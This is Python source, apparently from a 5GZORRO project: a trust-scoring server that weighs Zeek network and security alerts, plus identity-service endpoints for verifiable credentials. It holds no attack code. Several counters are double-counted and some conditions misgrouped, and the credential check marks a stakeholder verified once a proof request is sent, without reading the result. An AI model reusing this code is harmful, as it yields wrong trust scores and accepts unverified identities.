percentage of network packages correctly sent """
global icmp_orig_pkts
global tcp_orig_pkts
global udp_orig_pkts
"Weight definition"
ICMP = 0.3
TCP = 0.3
UDP = 0.4
"Variable definition"
icmp_orig_pkts = 0
tcp_orig_pkts = 0
udp_orig_pkts = 0
icmp_resp_pkts = 0
tcp_resp_pkts = 0
udp_resp_pkts = 0
timestamp = time.time()
timestamp_limit = timestamp - time_window
for log in conn_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if timestamp_log >= timestamp_limit:
if log["_source"]["network"]["transport"] == "icmp":
icmp_orig_pkts += icmp_orig_pkts + log["_source"]["source"]["packets"]
icmp_resp_pkts += icmp_resp_pkts + log["_source"]["destination"]["packets"]
elif log["_source"]["network"]["transport"] == "tcp":
tcp_orig_pkts += tcp_orig_pkts + log["_source"]["source"]["packets"]
tcp_resp_pkts += tcp_resp_pkts + log["_source"]["destination"]["packets"]
elif log["_source"]["network"]["transport"] == "udp":
udp_orig_pkts += udp_orig_pkts + log["_source"]["source"]["packets"]
udp_resp_pkts += udp_orig_pkts + log["_source"]["destination"]["packets"]
try:
icmp_packet_hit_rate = icmp_resp_pkts/icmp_orig_pkts
except ZeroDivisionError:
icmp_packet_hit_rate = 0
try:
tcp_packet_hit_rate = tcp_resp_pkts/tcp_orig_pkts
except ZeroDivisionError:
tcp_packet_hit_rate = 0
try:
udp_packet_hit_rate = udp_resp_pkts/udp_orig_pkts
except ZeroDivisionError:
udp_packet_hit_rate = 0
final_conn_value = ICMP * icmp_packet_hit_rate + TCP * tcp_packet_hit_rate + UDP * udp_packet_hit_rate
return final_conn_value
def notice_log(self, time_window, offer_type, notice_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from
critical security events detected by the Zeek """
"Generic label definition"
TOO_MUCH_LOSS = "CaptureLoss::Too_Much_Loss"
TOO_LITTLE_TRAFFIC = " CaptureLoss::Too_Little_Traffic"
WEIRD_ACTIVITY = "Weird::Activity"
PACKET_FILTER = "PacketFilter::Dropped_Packets"
SOFTWARE_VULNERABLE = "Software::Vulnerable_Version"
SQL_INJECTION_ATTACKER = "HTTP::SQL_Injection_Attacker"
SQL_INJECTION_VICTIM = "HTTP::SQL_Injection_Victim"
PASSWORD_GUESSING = "SSH::Password_Guessing"
"Edge specific label definition"
TOO_LONG_TO_COMPILE_FAILURE = "PacketFilter::Too_Long_To_Compile_Filter"
ADDRESS_SCAN = "Scan::Address_Scan"
PORT_SCAN = "Scan::Port_Scan"
MALWARE_HASH = "TeamCymruMalwareHashRegistry::Match"
TRACEROUTE = "Traceroute::Detected"
BLOCKED_HOST = "SMTP::Blocklist_Blocked_Host"
SUSPICIOUS_ORIGINATION = "SMTP::Suspicious_Origination"
CERTIFICATE_EXPIRED = "SSL::Certificate_Expired"
CERTIFICATE_NOT_VALID = "SSL::Certificate_Not_Valid_Yet"
SSL_HEARTBEAT_ATTACK = "Heartbleed::SSL_Heartbeat_Attack"
SSL_HEARTBEAT_ATTACK_SUCCESS = "Heartbleed::SSL_Heartbeat_Attack_Success"
SSL_WEAK_KEY = "SSL::Weak_Key"
SSL_OLD_VERSION = "SSL::Old_Version"
SSL_WEAK_CIPHER = "SSL::Weak_Cipher"
"Cloud specific label definition"
SERVER_FOUND = "ProtocolDetector::Server_Found"
BRUTEFORCING = "FTP::Bruteforcing"
"VNF/CNF specific label definition"
SENSITIVE_SIGNATURE = "Signatures::Sensitive_Signature"
COMPILE_FAILURE_PACKET_FILTER = "PacketFilter::Compile_Failure"
INSTALL_FAILURE = "PacketFilter::Install_Failure"
CONTENT_GAP = "Conn::Content_Gap"
"By default notice.log file is gathered after 15 minutes"
TIME_MONITORING_EVENT = 900
LAST_FIVE_TIME_MONITORING_EVENT = 4500
"List of general labels"
events_to_monitor = []
events_to_monitor.append(TOO_MUCH_LOSS)
events_to_monitor.append(TOO_LITTLE_TRAFFIC)
events_to_monitor.append(WEIRD_ACTIVITY)
events_to_monitor.append(PACKET_FILTER)
events_to_monitor.append(SOFTWARE_VULNERABLE)
events_to_monitor.append(PASSWORD_GUESSING)
"List of specific labels regarding the type of offer"
edge_events_to_monitor = []
edge_events_to_monitor.append(PORT_SCAN)
edge_events_to_monitor.append(TOO_LONG_TO_COMPILE_FAILURE)
edge_events_to_monitor.append(COMPILE_FAILURE_PACKET_FILTER)
edge_events_to_monitor.append(INSTALL_FAILURE)
edge_events_to_monitor.append(MALWARE_HASH)
edge_events_to_monitor.append(TRACEROUTE)
edge_events_to_monitor.append(ADDRESS_SCAN)
edge_events_to_monitor.append(BRUTEFORCING)
edge_events_to_monitor.append(BLOCKED_HOST)
edge_events_to_monitor.append(SUSPICIOUS_ORIGINATION)
edge_events_to_monitor.append(CERTIFICATE_EXPIRED)
edge_events_to_monitor.append(CERTIFICATE_NOT_VALID)
edge_events_to_monitor.append(SSL_HEARTBEAT_ATTACK)
edge_events_to_monitor.append(SSL_HEARTBEAT_ATTACK_SUCCESS)
edge_events_to_monitor.append(SSL_WEAK_KEY)
edge_events_to_monitor.append(SSL_OLD_VERSION)
edge_events_to_monitor.append(SSL_WEAK_CIPHER)
edge_events_to_monitor.append(SQL_INJECTION_ATTACKER)
edge_events_to_monitor.append(SQL_INJECTION_VICTIM)
cloud_events_to_monitor = []
cloud_events_to_monitor.append(PORT_SCAN)
cloud_events_to_monitor.append(COMPILE_FAILURE_PACKET_FILTER)
cloud_events_to_monitor.append(INSTALL_FAILURE)
cloud_events_to_monitor.append(SERVER_FOUND)
cloud_events_to_monitor.append(MALWARE_HASH)
cloud_events_to_monitor.append(TRACEROUTE)
cloud_events_to_monitor.append(ADDRESS_SCAN)
cloud_events_to_monitor.append(BRUTEFORCING)
cloud_events_to_monitor.append(CERTIFICATE_EXPIRED)
cloud_events_to_monitor.append(CERTIFICATE_NOT_VALID)
cloud_events_to_monitor.append(SSL_HEARTBEAT_ATTACK)
cloud_events_to_monitor.append(SSL_HEARTBEAT_ATTACK_SUCCESS)
cloud_events_to_monitor.append(SSL_WEAK_KEY)
cloud_events_to_monitor.append(SSL_OLD_VERSION)
cloud_events_to_monitor.append(SSL_WEAK_CIPHER)
cloud_events_to_monitor.append(SQL_INJECTION_ATTACKER)
cloud_events_to_monitor.append(SQL_INJECTION_VICTIM)
vnf_cnf_events_to_monitor = []
vnf_cnf_events_to_monitor.append(SENSITIVE_SIGNATURE)
vnf_cnf_events_to_monitor.append(COMPILE_FAILURE_PACKET_FILTER)
vnf_cnf_events_to_monitor.append(INSTALL_FAILURE)
vnf_cnf_events_to_monitor.append(MALWARE_HASH)
vnf_cnf_events_to_monitor.append(TRACEROUTE)
vnf_cnf_events_to_monitor.append(ADDRESS_SCAN)
vnf_cnf_events_to_monitor.append(PORT_SCAN)
vnf_cnf_events_to_monitor.append(CONTENT_GAP)
"Variable definition"
actual_event_number = 0
previous_monitoring_window_event_number = 0
last_five_monitoring_window_event_number = 0
timestamp = time.time()
timestamp_limit = timestamp - time_window
previous_event_monitoring_timestamp = timestamp - TIME_MONITORING_EVENT
last_five_event_monitoring_timestamp = timestamp - LAST_FIVE_TIME_MONITORING_EVENT
for log in notice_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if log["_source"]["zeek"]["notice"]["name"] in events_to_monitor and timestamp_log >= timestamp_limit:
actual_event_number += 1
elif log["_source"]["zeek"]["notice"]["name"] in events_to_monitor and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif log["_source"]["zeek"]["notice"]["name"] in events_to_monitor and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["notice"]["name"] in edge_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["notice"]["name"] in edge_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["notice"]["name"] in edge_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["notice"]["name"] in cloud_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["notice"]["name"] in cloud_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["notice"]["name"] in cloud_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf' and log["_source"]["zeek"]["notice"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= timestamp_limit:
actual_event_number += 1
elif offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf' and log["_source"]["zeek"]["notice"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_event_number += 1
last_five_monitoring_window_event_number += 1
elif offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf' and log["_source"]["zeek"]["notice"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_event_number += 1
try:
last_window_notice_events = actual_event_number/(previous_monitoring_window_event_number + actual_event_number)
except ZeroDivisionError:
last_window_notice_events = 0
try:
five_last_window_notice_events = actual_event_number / actual_event_number + ( last_five_monitoring_window_event_number / 5)
except ZeroDivisionError:
five_last_window_notice_events = 0
final_notice_value = 1 - ((last_window_notice_events + five_last_window_notice_events) / 2)
return final_notice_value
def weird_log(self, time_window, offer_type, weird_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from
weird events detected by the Zeek """
"Label definition"
DNS_UNMTATCHED_REPLY = "dns_unmatched_reply"
ACTIVE_CONNECTION_REUSE = "active_connection_reuse"
SPLIT_ROUTING = "possible_split_routing"
INAPPROPIATE_FIN = "inappropriate_FIN"
FRAGMENT_PAKCKET = "fragment_with_DF"
BAD_ICMP_CHECKSUM = "bad_ICMP_checksum"
BAD_UDP_CHECKSUM = "bad_UDP_checksum"
BAD_TCP_CHECKSUM = "bad_TCP_checksum"
TCP_CHRISTMAS = "TCP_Christmas"
UNSCAPED_PERCENTAGE_URI = "unescaped_%_in_URI"
ILLEGAL_ENCODING = "base64_illegal_encoding"
BAD_HTTP_REPLY = "bad_HTTP_reply"
MALFORMED_SSH_IDENTIFICATION = "malformed_ssh_identification"
MALFORMED_SSH_VERSION = "malformed_ssh_version"
"List of labels"
weird_event_list = []
weird_event_list.append(DNS_UNMTATCHED_REPLY)
weird_event_list.append(ACTIVE_CONNECTION_REUSE)
weird_event_list.append(ILLEGAL_ENCODING)
"List of specific labels regarding the type of offer"
edge_events_to_monitor = []
edge_events_to_monitor.append(SPLIT_ROUTING)
edge_events_to_monitor.append(BAD_ICMP_CHECKSUM)
edge_events_to_monitor.append(BAD_UDP_CHECKSUM)
edge_events_to_monitor.append(BAD_TCP_CHECKSUM)
edge_events_to_monitor.append(TCP_CHRISTMAS)
edge_events_to_monitor.append(UNSCAPED_PERCENTAGE_URI)
edge_events_to_monitor.append(BAD_HTTP_REPLY)
cloud_events_to_monitor = []
cloud_events_to_monitor.append(SPLIT_ROUTING)
cloud_events_to_monitor.append(BAD_ICMP_CHECKSUM)
cloud_events_to_monitor.append(BAD_UDP_CHECKSUM)
cloud_events_to_monitor.append(BAD_TCP_CHECKSUM)
cloud_events_to_monitor.append(TCP_CHRISTMAS)
cloud_events_to_monitor.append(BAD_HTTP_REPLY)
vnf_cnf_events_to_monitor = []
vnf_cnf_events_to_monitor.append(INAPPROPIATE_FIN)
vnf_cnf_events_to_monitor.append(FRAGMENT_PAKCKET)
vnf_cnf_events_to_monitor.append(MALFORMED_SSH_IDENTIFICATION)
vnf_cnf_events_to_monitor.append(MALFORMED_SSH_VERSION)
"Variable definition"
actual_weird_event_number = 0
previous_monitoring_window_weird_event_number = 0
last_five_monitoring_window_weird_event_number = 0
"By default weird.log file is gathered after 15 minutes, VERIFY!"
TIME_MONITORING_WEIRD_EVENT = 900
LAST_FIVE_TIME_MONITORING_WEIRD_EVENT = 4500
timestamp = time.time()
timestamp_limit = timestamp - time_window
previous_event_monitoring_timestamp = timestamp - TIME_MONITORING_WEIRD_EVENT
last_five_event_monitoring_timestamp = timestamp - LAST_FIVE_TIME_MONITORING_WEIRD_EVENT
for log in weird_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if log["_source"]["zeek"]["weird"]["name"] in weird_event_list and timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif log["_source"]["zeek"]["weird"]["name"] in weird_event_list and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif log["_source"]["zeek"]["weird"]["name"] in weird_event_list and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["weird"]["name"] in edge_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["weird"]["name"] in edge_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'edge' and log["_source"]["zeek"]["weird"]["name"] in edge_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["weird"]["name"] in cloud_events_to_monitor and \
timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["weird"]["name"] in cloud_events_to_monitor and \
timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'cloud' and log["_source"]["zeek"]["weird"]["name"] in cloud_events_to_monitor and \
timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf' and log["_source"]["zeek"]["weird"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= timestamp_limit:
actual_weird_event_number += 1
elif offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf' and log["_source"]["zeek"]["weird"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= previous_event_monitoring_timestamp:
previous_monitoring_window_weird_event_number += 1
last_five_monitoring_window_weird_event_number += 1
elif offer_type.lower() == 'vnf' or offer_type.lower() == 'cnf' and log["_source"]["zeek"]["weird"]["name"] \
in vnf_cnf_events_to_monitor and timestamp_log >= last_five_event_monitoring_timestamp:
last_five_monitoring_window_weird_event_number += 1
try:
last_window_weird_events = actual_weird_event_number/(previous_monitoring_window_weird_event_number + actual_weird_event_number)
except ZeroDivisionError:
last_window_weird_events = 0
try:
five_last_window_weird_events = actual_weird_event_number / actual_weird_event_number + (last_five_monitoring_window_weird_event_number / 5)
except ZeroDivisionError:
five_last_window_weird_events = 0
final_weird_value = 1 - (( last_window_weird_events + five_last_window_weird_events ) / 2)
return final_weird_value
def stats_log(self, time_window, icmp_sent_pkts, tcp_sent_pkts, udp_sent_pkts, stat_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from the
percentage of network packages sent and the packets finally analyzed by Zeek"""
"Global variable definition"
global icmp_orig_pkts
global tcp_orig_pkts
global udp_orig_pkts
"Weight definition"
ICMP = 0.3
TCP = 0.3
UDP = 0.4
"Variable definition"
icmp_orig_pkts = icmp_sent_pkts
tcp_orig_pkts = tcp_sent_pkts
udp_orig_pkts = udp_sent_pkts
icmp_pkts_analyzed_by_zeek = 0
tcp_pkts_analyzed_by_zeek = 0
udp_pkts_analyzed_by_zeek = 0
timestamp = time.time()
timestamp_limit = timestamp - time_window
for log in stat_info:
timestamp_log = time.mktime(time.strptime(log["_source"]["@timestamp"].split(".")[0], '%Y-%m-%dT%H:%M:%S'))
if timestamp_log >= timestamp_limit:
icmp_pkts_analyzed_by_zeek += icmp_pkts_analyzed_by_zeek + log["_source"]["zeek"]["connections"]["icmp"]["count"]
tcp_pkts_analyzed_by_zeek += tcp_pkts_analyzed_by_zeek + log["_source"]["zeek"]["connections"]["tcp"]["count"]
udp_pkts_analyzed_by_zeek += udp_pkts_analyzed_by_zeek + log["_source"]["zeek"]["connections"]["udp"]["count"]
try:
icmp_packet_rate_analyzed_by_zeek = icmp_pkts_analyzed_by_zeek/icmp_orig_pkts
except ZeroDivisionError:
icmp_packet_rate_analyzed_by_zeek = 0
try:
tcp_packet_rate_analyzed_by_zeek = tcp_pkts_analyzed_by_zeek/tcp_orig_pkts
except ZeroDivisionError:
tcp_packet_rate_analyzed_by_zeek = 0
try:
udp_packet_rate_analyzed_by_zeek = udp_pkts_analyzed_by_zeek/udp_orig_pkts
except ZeroDivisionError:
udp_packet_rate_analyzed_by_zeek = 0
final_stats_value = ICMP * icmp_packet_rate_analyzed_by_zeek + TCP * tcp_packet_rate_analyzed_by_zeek + UDP * \
udp_packet_rate_analyzed_by_zeek
return final_stats_value
class stop_relationship(Resource):
def post(self):
"""This method stops a trust relationship"""
req = request.data.decode("utf-8")
information = json.loads(req)
print("\n$$$$$$$$$$$$$$ Finishing a trust relationship with", information['offerDID'],"$$$$$$$$$$$$$$\n")
for thread in threads:
if information['offerDID'] in thread:
thread['stop_event'].set()
for i in range(len(threads)):
if information['offerDID'] in threads[i]:
del threads[i]
print("\n$$$$$$$$$$$$$$ Finished a trust relationship with", information['offerDID'],"$$$$$$$$$$$$$$\n")
print("\n$$$$$$$$$$$$$$ Ending update trust level process on", information['offerDID'], "$$$$$$$$$$$$$$\n")
return 200
return 400
class query_trust_information(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
last_trust_value = consumer.readLastTrustValues(peerTrust.historical, information["trustorDID"],
information["trusteeDID"], information['last_trustee_interaction_registered'],
information['currentInteractionNumber'])
return last_trust_value
class query_trust_score(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
last_trust_value = consumer.readLastTrustValueOffer(peerTrust.historical, information["trustorDID"], information["trusteeDID"], information["offerDID"])
return {'trust_value': last_trust_value["trust_value"]}
class query_satisfaction_score(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
last_user_satisfaction = consumer.readSatisfaction(peerTrust.historical, information["trustorDID"], information["trusteeDID"], information["offerDID"])
return {'userSatisfaction': last_user_satisfaction}
class notify_selection(Resource):
def post(self):
""" This method will request a recommendation to a given recommender after looking in the interactions in the Data Lake"""
req = request.data.decode("utf-8")
information = json.loads(req)
"The ISSM sends to the TRMF the final selected offer"
response = requests.post("http://localhost:5002/update_trust_level", data=json.dumps(information).encode("utf-8"))
return response.text
def launch_server_REST(port):
api.add_resource(initialise_offer_type, '/initialise_offer_type')
api.add_resource(start_data_collection, '/start_data_collection')
api.add_resource(gather_information, '/gather_information')
api.add_resource(compute_trust_level, '/compute_trust_level')
api.add_resource(store_trust_level, '/store_trust_level')
api.add_resource(update_trust_level, '/update_trust_level')
api.add_resource(stop_relationship, '/stop_relationship')
api.add_resource(query_trust_information, '/query_trust_information')
api.add_resource(query_trust_score, '/query_trust_score')
api.add_resource(query_satisfaction_score, '/query_satisfaction_score')
api.add_resource(notify_selection, '/notify_selection')
http_server = WSGIServer(('0.0.0.0', port), app)
http_server.serve_forever()
if __name__ == "__main__":
if len(sys.argv)!=2:
print("Usage: python3 trustManagementFramework.py [port]")
else:
port = int(sys.argv[1])
launch_server_REST(port)
``` |
{
"source": "5GZORRO/identity",
"score": 3
} |
#### File: app/authentication/verify_credential.py
```python
from typing import Optional, List
from fastapi import APIRouter, Response, status
from fastapi.responses import JSONResponse
from pydantic import BaseModel
import requests, json, sys, os, time, threading, jwt
from enum import Enum
from bson import ObjectId
from loguru import logger
from app.db import mongo_setup_admin
from app.bootstrap import setup_issuer
from app.bootstrap.key import holder_key
router = APIRouter(
prefix="/authentication",
tags=["authentication"]
)
class EncodedProof(BaseModel):
proof_token: str
header = {
'Content-Type': 'application/json'
}
@router.post("/verify_credential", status_code=202)
async def verify_credential(response: Response, body: EncodedProof):
# Read encoded object
try:
body_dict = body.dict()
key = os.environ["KEY"]
decoded = jwt.decode(body_dict["proof_token"], key, algorithms="HS256")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to read proof token")
# Check if Admin has emitted cred, and check if already verified
try:
subscriber = mongo_setup_admin.stakeholder_col.find_one({"stakeholderClaim.stakeholderDID": decoded["stakeholderDID"]})
if subscriber is None:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Stakeholder Credential wasn't emitted by this Admin Agent")
else:
if "verified" in subscriber:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Stakeholder Credential already verified")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to check who emitted Stakeholder Credential")
# SETUP CONNECTION
try:
setup_issuer.issuer_connection(decoded["service_endpoint"])
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to establish Issuer Connection")
# Perform validation
try:
verify_object = {
"connection_id": setup_issuer.connection_id,
"comment": "Verify Stakeholder",
"proof_request": {
"name": "<NAME>",
"version": "1.0",
"requested_attributes": {},
"requested_predicates": {
"0_timestamp_GE_uuid": {
"name": "timestamp",
"p_type": ">=",
"p_value": int(subscriber["timestamp"]),
"restrictions": [
{
"cred_def_id": subscriber["credential_definition_id"]
}
]
},
"1_timestamp_GE_uuid": {
"name": "timestamp",
"p_type": "<=",
"p_value": int(subscriber["timestamp"]),
"restrictions": [
{
"cred_def_id": subscriber["credential_definition_id"]
}
]
}
}
}
}
URL = os.environ["ISSUER_AGENT_URL"]
resp = requests.post(URL+"/present-proof/send-request", data=json.dumps(verify_object), headers=header, timeout=60)
verify_info = json.loads(resp.text)
if verify_info["state"] == "request_sent":
# Check for verification true
#final_resp = requests.get(URL+"/present-proof/records/"+verify_info["presentation_exchange_id"], headers=header, timeout=60)
#check_true = json.loads(final_resp.text)
#print(check_true)
#time.sleep(10)
#if check_true["verified"] == "true":
# UPDATE REQUEST RECORD FROM MONGO
mongo_setup_admin.stakeholder_col.find_one_and_update({"stakeholderClaim.stakeholderDID": decoded["stakeholderDID"]}, {'$set': {"verified": True}})
ending = {
"stakeholderDID": decoded["stakeholderDID"],
"verified": True
}
return ending
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to perform validation")
```
#### File: bootstrap/key/issuer_key.py
```python
import requests, json, time, sys, os
from timeloop import Timeloop
from datetime import timedelta
def general_message(status, message, code):
response = {"status": status, "message": message, "code": code}
return json.dumps(response, indent = 4)
#tl = Timeloop()
<EMAIL>(interval=timedelta(seconds=86400))
def issuer_key_create():
try:
print("\n")
print("####################################################")
print("#################### ISSUER KEY ####################")
print("####################################################")
holder_url = os.environ["ISSUER_AGENT_URL"]
resp = requests.post(holder_url+"/wallet/did/create", timeout=30)
result = resp.json()
#did = result["result"]["did"]
global verkey
verkey = result["result"]["verkey"]
print("Verification Key: " + str(verkey))
print("#################### ISSUER KEY - END ####################")
print("\n")
except:
print(general_message("error", "Unable to create bootstrap verification key.", 400))
sys.exit()
#tl.start(block=False)
```
#### File: app/bootstrap/setup_verifier.py
```python
import requests, json, time, sys, os
def general_message(status, message, code):
response = {"status": status, "message": message, "code": code}
return json.dumps(response, indent = 4)
header = {
'Content-Type': 'application/json'
}
def verifier_connection():
print("\n")
print("#############################################################")
print("#################### VERIFIER CONNECTION ####################")
print("#############################################################")
#connection_id = "teste_2"
global connection_id
try:
URL = os.environ["VERIFIER_AGENT_URL"]
resp = requests.post(URL+"/connections/create-invitation", headers=header, timeout=30)
body = resp.json()
connection_id = body["connection_id"]
conn_invite = json.dumps(body["invitation"], indent = 4)
print(connection_id)
print(conn_invite)
except:
print(general_message("error", "Unable to post Invitation.", 400))
sys.exit()
try:
URL_holder = os.environ["HOLDER_AGENT_URL"]
resp_accept = requests.post(URL_holder+"/connections/receive-invitation", data=conn_invite, headers=header, timeout=30)
body_accept = resp_accept.json()
print(body_accept)
except:
print(general_message("error", "Unable to accept Invitation.", 400))
sys.exit()
time.sleep(10)
try:
resp_confirm_active = requests.get(URL+"/connections/"+connection_id, timeout=30)
body_active = resp_confirm_active.json()
if body_active["state"] == 'active':
#log_message(200, "Issuer Connection established successfully.")
print(general_message("success", "Verifier Connection established successfully.", 200))
except:
print(general_message("error", "Unable to establish Verifier Connection.", 400))
sys.exit()
print("#################### VERIFIER CONNECTION - END ####################")
print("\n")
```
#### File: app/holder/holder_did.py
```python
from fastapi import APIRouter, Response, status
from fastapi.responses import JSONResponse
import requests, json, sys, os, time, threading, copy
from loguru import logger
from bson import ObjectId
#from app.authentication import authentication
from app.db import mongo_setup_provider
from app.holder import utils
# classes
from app.holder.classes import Offer, ReadOfferDID, State
router = APIRouter(
prefix="/holder",
tags=["holder"]
)
@router.post("/create_did", status_code=201)
async def request_credential(response: Response, body: Offer):
# AUTH
try:
body_dict = body.dict()
subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": body_dict["token"]})
if subscriber is not None:
if body_dict["token"] != subscriber["id_token"]:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
else:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to verify ID Token")
# PRIVATE DID
try:
holder_url = os.environ["HOLDER_AGENT_URL"]
resp = requests.post(holder_url+"/wallet/did/create", timeout=30)
result = resp.json()
did = result["result"]["did"]
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to create wallet DID")
# STORE REQUEST ON MONGO
try:
epoch_ts = str(int(time.time()))
# MONGO WILL ADD _id TO THIS DICT
res_to_mongo = {
"type": body_dict["type"],
"credentialSubject": {
"id": did,
"claims": body_dict["claims"]
},
"timestamp": epoch_ts,
"state": State.did_offer_request,
"handler_url": body_dict["handler_url"]
}
client_res = copy.deepcopy(res_to_mongo)
mongo_setup_provider.collection.insert_one(res_to_mongo)
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to store Credential request on Database")
# SEND TO ADMIN
try:
res_to_admin = {
"type": body_dict["type"],
"credentialSubject": {
"id": did,
"claims": body_dict["claims"]
},
"timestamp": epoch_ts,
"service_endpoint": os.environ["TRADING_PROVIDER_AGENT_CONTROLLER_URL"],
"agent_service_endpoint": holder_url
#"handler_url": handler_url
}
#print(res_to_admin)
URL = os.environ["ADMIN_AGENT_CONTROLLER_URL"]
requests.post(URL+"/issuer/request_credential_issue/"+str(res_to_mongo["_id"]), json=res_to_admin, timeout=60)
# SEND TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(body_dict["handler_url"],client_res,), daemon=True)
thread.start()
return client_res
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to perform Credential issuing request")
@router.post("/decline_offer_did/{request_id}", include_in_schema=False)
async def decline_offer_did(request_id: str, response: Response):
#UPDATE MONGO RECORD
try:
mongo_setup_provider.collection.find_one_and_update({'_id': ObjectId(request_id)}, {'$set': {"state": State.did_offer_decline}}) # UPDATE REQUEST RECORD FROM MONGO
subscriber = mongo_setup_provider.collection.find_one({"_id": ObjectId(request_id)}, {"_id": 0})
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update Mongo record")
# SEND REQUEST RECORD TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(subscriber["handler_url"],subscriber,), daemon=True)
thread.start()
@router.post("/update_did_state/{request_id}", include_in_schema=False)
async def update_did_state(request_id: str, body: dict, response: Response):
#UPDATE MONGO RECORD
try:
#print(body)
mongo_setup_provider.collection.find_one_and_update({'_id': ObjectId(request_id)}, {'$set': {"state": State.did_offer_issue, "credential_definition_id": body["credential_definition_id"], "credential_exchange_id": body["credential_exchange_id"]}}) # UPDATE REQUEST RECORD FROM MONGO
subscriber = mongo_setup_provider.collection.find_one({"_id": ObjectId(request_id)})
#print(subscriber["handler_url"])
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update Mongo record")
# SEND REQUEST RECORD TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(subscriber["handler_url"],body,), daemon=True)
thread.start()
@router.post("/update_revoked_state/{credential_exchange_id}", include_in_schema=False)
async def update_revoked_state(credential_exchange_id: str, body: dict, response: Response):
#UPDATE MONGO RECORD
try:
#print(body)
